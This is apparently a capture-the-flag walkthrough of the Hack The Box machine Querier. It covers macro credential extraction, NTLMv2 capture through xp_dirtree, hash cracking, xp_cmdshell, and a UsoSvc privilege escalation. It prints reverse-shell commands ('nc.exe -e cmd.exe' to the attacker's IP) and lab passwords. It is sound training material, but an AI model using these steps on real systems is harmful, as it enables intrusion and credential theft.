We start off by scanning all TCP ports with nmap -p-. Once that finishes we take the open ports (ignoring the high-numbered RPC ports above 49000, which are Windows dynamic RPC endpoints) and rescan them with service and script detection to get the following results. Note what the second scan already gives us: the MSSQL NTLM info leaks the hostname QUERIER and the domain HTB.LOCAL, the product version 10.0.17763 is Windows Server 2019, and SMB signing is enabled but not required.

nmap -p-


135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

nmap -p 135,139,445,1433,5985,47001  -A -T4


135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-10-11T09:14:54
|_Not valid after:  2050-10-11T09:14:54
|_ssl-date: 2020-10-11T09:40:25+00:00; +23s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 22s, deviation: 0s, median: 22s
| ms-sql-info: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-11T09:40:21
|_  start_date: N/A


We start by checking the SMB ports with smbclient. The -N switch suppresses the password prompt, so we are attempting a null session. We can list the remote shares with smbclient -L <IP> -N.

After finding the Reports share we can connect to it directly with smbclient '\\<IP>\Reports' -N. The single quotes matter: unquoted, the shell consumes the backslashes and smbclient never sees a valid UNC path (doubling every backslash works too).

From here we can grab the .xlsm file in the share using the get command.

XLSM is a macro-enabled XLSX workbook; like any OOXML file it is a ZIP archive of XML parts, with the VBA project stored as the binary part xl/vbaProject.bin. We can use binwalk with the -e switch to extract the archive to a folder (unzip works just as well).

We can run the strings command on the vbaProject.bin file to obtain the following information, where Uid and Pwd in the connection string appear to be credentials.

We can also view the macro in LibreOffice Calc to obtain the same information.
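The same extraction done in code, as an added example that is not part of the original writeup: open the .xlsm as a ZIP, pull out xl/vbaProject.bin, run a strings-style scan over it and pick the Uid/Pwd pairs out of any connection string. The workbook it reads is constructed in memory (not the file from the share) so the block runs offline; the credentials placed in it are the ones recovered above.

```python
"""Recover credentials from the VBA project of a macro-enabled workbook.

Added example, not code from the writeup. The macro source inside
vbaProject.bin is MS-OVBA compressed, but long literal runs such as a
connection string usually survive intact, which is why `strings` worked.
"""
import io
import re
import zipfile

# Default behaviour of `strings`: runs of 4+ printable ASCII bytes.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")
# ODBC-style connection-string keys that carry credentials.
CRED_PAIR = re.compile(r"\b(Uid|Pwd|User ID|Password)=([^;\"']+)", re.I)


def strings(blob: bytes) -> list:
    """Return the printable runs in blob, like the `strings` tool."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(blob)]


def vba_project(xlsm_bytes: bytes) -> bytes:
    """Return the raw VBA project part, or fail if this is a plain .xlsx."""
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as zf:
        names = [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]
        if not names:
            raise ValueError("no VBA project: this workbook carries no macros")
        return zf.read(names[0])


def find_credentials(xlsm_bytes: bytes) -> dict:
    """Map of lower-cased key -> value for every Uid/Pwd style pair found."""
    found = {}
    for run in strings(vba_project(xlsm_bytes)):
        for key, value in CRED_PAIR.findall(run):
            found[key.lower()] = value
    return found


def build_sample_xlsm() -> bytes:
    """Constructed stand-in for the share's workbook (assumption: not the real file)."""
    macro = (
        b"Dim conn As ADODB.Connection\r\n"
        b'conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;'
        b'Uid=reporting;Pwd=PcwTWTHRwryjc$c6;"\r\n'
    )
    # A real vbaProject.bin is an OLE compound file; some binary padding around
    # the text is enough to show that strings() skips the non-printable parts.
    vba_bin = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 32 + macro + b"\x00" * 16
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/vbaProject.bin", vba_bin)
    return buf.getvalue()


if __name__ == "__main__":
    print(find_credentials(build_sample_xlsm()))
```

If the credentials are not visible to strings (the literal got split by the compression), the proper tool is olevba from oletools, which decompresses the module streams and prints the full macro source.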

We have obtained the following credentials:

  • Username = reporting

  • Password = PcwTWTHRwryjc$c6

We can then use Impacket's mssqlclient.py to connect to the SQL server on port 1433 with the credentials we have found. Before we do so we need to edit our hosts file so we can authenticate to MSSQL.

Add the box's domain name (HTB.LOCAL and the hostname QUERIER, as seen in the nmap output) to /etc/hosts.

After this has been completed we can then navigate to the directory where mssqlclient.py is installed and run the python script using the following syntax:

python mssqlclient.py  querier/reporting:'PcwTWTHRwryjc$c6'@ -windows-auth

The $ symbol in the password would otherwise be expanded by the shell ($c6 is treated as a variable and replaced with an empty string), so the password has to be wrapped in single quotes to send it "as is" for the authentication to succeed.

From here the first thing to try is xp_cmdshell to see if we can get command execution. In this instance access was denied (the reporting login is not sysadmin), so we need another way in. What we can do is make the SQL Server service account authenticate to an SMB server on our attacking machine. SQL Server runs as a Windows service, so any UNC path it touches is opened with that service account's credentials, and its NTLM challenge/response lands in our listener. What we capture is a Net-NTLMv2 response, not the NT hash itself: it cannot be passed, but it can be cracked.

When the victim machine sends its request we capture the NTLMv2 response and attempt to crack it offline with Hashcat (mode 5600) or John the Ripper (format netntlmv2).

To start this process we need an SMB server on our attacking machine. Impacket has a script for this called smbserver.py:

python3 smbserver.py -smb2support <sharename> <sharepath>

From here we run EXEC xp_dirtree on the victim machine, pointing it at the UNC path of our share (\\<IP>\<sharename>). xp_dirtree only lists a directory and is callable by low-privileged logins, but it makes SQL Server connect out to our SMB server, where we capture the NTLMv2 response.

The above command was taken from this Medium article which I highly recommend reading regarding this.

We can see on Kali we have caught the NTLMv2 hash.

We can save the NTLMv2 hash to file and attempt to crack with John The Ripper. If you are having issues with the NTLMv2 hash not loading in John or Hashcat you may be using the latest version of Impacket which was causing me this issue. I reached out for help on TCM's Discord channel and was advised to use Impacket 0.9.19 (I was using 0.9.21).

I was able to easily uninstall Impacket and reinstall with 0.9.21 using Dewalt's pimpmykali python script found here:

After this I was able to grab the NTLMv2 hash again and load it into John successfully.

From here we run this hash through John with the rockyou.txt word list.

We now have the password "corporate568". We can log into the MSSQL server again as above, this time as mssql-svc, the account name that appeared in the captured NTLMv2 response.

mssqlclient.py  querier/mssql-svc:'corporate568'@ -windows-auth 

Running the help command we get the following output:

What we want is xp_cmdshell. It is disabled by default, so we first enable it with mssqlclient's enable_xp_cmdshell command, which runs sp_configure for 'show advanced options' and 'xp_cmdshell' under the hood. This needs sysadmin rights, which mssql-svc has and reporting did not.

After this we can execute cmd commands. We would ideally use this to get a reverse shell, which makes everything easier. I initially tried hosting netcat on the attacking machine with Python and could not get a callback using PowerShell Invoke-WebRequest or certutil.exe.

Instead I decided to use the smbserver.py script from earlier: host nc.exe in the SMB share and execute it from the MSSQL server over the UNC path.

Move nc.exe to a preferred directory. For ease of use I moved nc.exe into the same directory in which I have smbserver.py located. Once done, start the SMB server again with the following command; the share name must match the one used in the UNC path below (shared):

sudo python smbserver.py -smb2support <sharename> ./

Once that is running, start a netcat listener on the attacking machine with nc -lvp 4444.

We can now execute the following command on the MSSQL server:

xp_cmdshell \\<IP>\shared\nc.exe -e cmd.exe <IP> 4444

We now have a reverse shell.

We can now grab the user.txt flag before moving onto Privilege escalation.

Privilege Escalation

I started off with basic enumeration and found with whoami /priv that we have SeImpersonatePrivilege; however, as we are on a Windows Server 2019 machine (build 17763 per the nmap output) I was unable to execute the exploit. With anything older than Server 2019 this is usually an easy win.

I uploaded powerup.ps1 to the SMB server and then copied this down into the Reporting directory at C:\Reporting since we have write and execute permissions in this folder.

PowerUp also picks up the SeImpersonate privilege when running Invoke-AllChecks. What we are interested in is the service 'UsoSvc', which PowerUp flags because our user can modify its configuration. By default the recommended AbuseFunction listed in the output (Invoke-ServiceAbuse) adds a new local administrator account for us.

Instead we use the AbuseFunction to run a netcat reverse shell, passing our own command with the -Command parameter:

Invoke-ServiceAbuse -Name 'UsoSvc' -Command "\\<IP>\shared\nc.exe -e cmd.exe <IP> 6666"

Once again this calls nc.exe from the SMB share we hosted earlier, so make sure the share is still up and start a netcat listener on port 6666 on the attacking machine first. Invoke-ServiceAbuse swaps the service's binary path for our command, restarts the service so the Service Control Manager runs the command as the service account, then restores the original path. nc.exe is not a real service binary, so the service start "fails", but by then our command has already run. If done correctly this should call back as NT AUTHORITY\SYSTEM.

From here we can grab the root.txt flag.
